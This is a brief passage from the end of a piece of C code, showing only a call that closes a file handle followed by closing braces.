        fclose(fp);
    }
}
